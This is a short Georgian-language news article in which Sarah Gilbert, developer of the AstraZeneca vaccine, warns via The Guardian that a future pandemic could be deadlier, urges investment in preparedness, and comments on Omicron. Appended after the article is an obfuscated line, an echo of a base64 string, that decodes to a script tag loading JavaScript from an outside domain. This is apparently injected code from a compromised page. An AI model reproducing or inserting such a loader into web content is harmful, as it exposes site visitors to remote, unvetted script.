celsiusi
ავერსი შნაიდერი
ასტრაზენეკას ვაქცინის შემქმნელის, სარა ჯილბერტის განცხადებით, კორონავირუსის პანდემია დასრულებისგან ჯერ კიდევ შორსაა და შემდეგი პანდემია, რომელიც შესაძლოა მსოფლიოში დაიწყოს, იქნება უფრო ლეტალური.
 
ინფორმაციას The Guardian ავრცელებს.
 
„ეს არ არის ბოლო შემთხვევა, როდესაც ვირუსი ჩვენს სიცოცხლეს ემუქრება. სიმართლე ისაა, რომ შემდეგი შეიძლება უარესი იყოს. შესაძლოა შემდეგი ვირუსი იყოს უფრო გადამდები, ან უფრო მომაკვდინებელი, ან ორივე ერთად.
 
მისი განცხადებით, კაცობრიობა პანდემიებთან გასამკლავებლად მუდმივად მზად უნდა იყოს.
 
„როგორც შეიარაღებულ ძალებში, დაზვერვასა და დიპლომატიაში ვხარჯავთ ფულს, რათა თავიდან ავიცილოთ ომები, ასევე, აუცილებლად უნდა დავხარჯოთ თანხები კვლევებში, ინსტიტუტებსა და მედიკამენტების წარმოებებში, რათა დავიცვათ საკუთარი თავი პანდემიებისგან“, – განაცხადა სარა ჯილბერტმა.
 
მისი განცხადებით, კორონავირუსის ახალი ვარიანტის, ომიკრონის წინააღმდეგ, რომელიც ადვილად ვრცელდება, ვაქცინაციის შედეგად ან ვირუსით ინფიცირების დროს გამომუშავებული იმუნიტეტი, შესაძლოა, ნაკლებად ეფექტური იყოს, თუმცა ეს აუცილებლად არ ნიშნავს, რომ ვირუსს უფრო მწვავე მიმდინარეობა ექნება.
 
ომიკრონი კორონავირუსის ახალი ვარიანტია, რომელიც თავდაპირველად სამხრეთაფრიკულ ქვეყნებში დააფიქსირეს.
 
ვირუსი მუდმივად განიცდის მუტაციას. მუტაციების უმეტესობა ვირუსს ასუსტებს, თუმცა, ზოგ შემთხვევაში, ვირუსი უფრო გადამდები ან მომაკვდინებელი ხდება.
1001
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");